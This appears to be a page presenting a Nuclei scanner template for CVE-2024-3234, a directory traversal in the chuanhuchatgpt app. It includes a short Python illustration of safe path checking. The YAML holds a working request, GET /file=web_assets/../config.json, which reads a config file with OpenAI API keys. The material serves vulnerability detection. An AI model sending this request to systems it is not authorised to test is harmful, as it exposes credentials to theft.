Chuanhu Chat - Directory Traversal
ID: CVE-2024-3234
Severity: critical
Author: DhiyaneshDk
Tags: cve,cve2024,chuanhuchatgpt,lfi
Description
The gaizhenbiao/chuanhuchatgpt application is vulnerable to a path traversal attack due to its use of an outdated gradio component. The application is designed to restrict user access to resources within the web_assets folder. However, the outdated version of gradio it employs is susceptible to path traversal, as identified in CVE-2023-51449. This vulnerability allows unauthorized users to bypass the intended restrictions and access sensitive files, such as config.json, which contains API keys. The issue affects the latest version of chuanhuchatgpt prior to the fixed version released on 20240305.
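The following is an added illustration, not code from chuanhuchatgpt or gradio: it shows why a request path such as web_assets/../config.json passes a folder check that only compares path components, and how resolving the path before the check rejects it. The install path /srv/app and both function names are assumptions made for the example.

```python
from pathlib import Path

# Assumed layout for illustration: the app directory holds config.json and a
# web_assets/ folder that is the only tree clients are meant to read.
APP_DIR = Path("/srv/app")            # hypothetical install path
ALLOWED_DIR = APP_DIR / "web_assets"


def naive_is_allowed(requested: str) -> bool:
    """Lexical check only: compares path components, never collapses '..'."""
    try:
        (APP_DIR / requested).relative_to(ALLOWED_DIR)
        return True
    except ValueError:
        return False


def safe_is_allowed(requested: str) -> bool:
    """Resolve '..' segments and symlinks first, then test containment."""
    candidate = (APP_DIR / requested).resolve()
    try:
        candidate.relative_to(ALLOWED_DIR.resolve())
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample inputs; the second is the path used by the template.
    samples = [
        "web_assets/logo.png",
        "web_assets/../config.json",
        "web_assets/sub/../../config.json",
        "/etc/passwd",
    ]
    for path in samples:
        print(f"{path!r:40} naive={naive_is_allowed(path)!s:5} "
              f"safe={safe_is_allowed(path)}")
```

The same containment test belongs on any file-serving route, applied after URL decoding and before the file is opened.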
YAML Source
```yaml
id: CVE-2024-3234

info:
  name: Chuanhu Chat - Directory Traversal
  author: DhiyaneshDk
  severity: critical
  description: |
    The gaizhenbiao/chuanhuchatgpt application is vulnerable to a path traversal attack due to its use of an outdated gradio component. The application is designed to restrict user access to resources within the `web_assets` folder. However, the outdated version of gradio it employs is susceptible to path traversal, as identified in CVE-2023-51449. This vulnerability allows unauthorized users to bypass the intended restrictions and access sensitive files, such as `config.json`, which contains API keys. The issue affects the latest version of chuanhuchatgpt prior to the fixed version released on 20240305.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3234
    cwe-id: CWE-22
    epss-score: 0.00089
    epss-percentile: 0.38614
    cpe: cpe:2.3:a:gaizhenbiao:chuanhuchatgpt:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gaizhenbiao
    product: chuanhuchatgpt
  tags: cve,cve2024,chuanhuchatgpt,lfi

http:
  - raw:
      - |
        GET /file=web_assets/../config.json HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"openai_api_key":'
          - '"openai_api_type":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e34f8ff15855bf12121d40f5a1dcca74a44be05bee0d6d98416e89a9a12df6cf02210094135a08eb3e62f7829b3e041319d922b9789c0115c591790de7c48f6fee97a8:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-3234.yaml"